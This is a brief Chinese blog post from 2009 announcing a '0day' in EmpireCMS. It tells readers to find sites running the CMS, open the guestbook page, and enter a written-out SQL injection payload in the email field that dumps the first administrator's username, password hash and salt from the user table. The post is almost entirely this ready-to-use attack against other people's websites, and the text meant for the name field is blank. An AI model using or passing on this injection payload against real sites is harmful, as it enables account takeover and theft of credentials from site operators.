夜火博客

帝国CMS网站程序0DAY

2009-06-23
漏洞信息
EmpireCMS
0day
1分钟
64字

帝国CMS网站程序0DAY:找到使用帝国CMS的站,网址后面直接加:

e/tool/gbook/?bid=1

出来的是帝国CMS的留言本,在姓名处写:

联系邮箱处写:

,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/*

提交后爆出账号密码

via:amxking

本文标题:帝国CMS网站程序0DAY
文章作者:夜火
发布时间:2009-06-23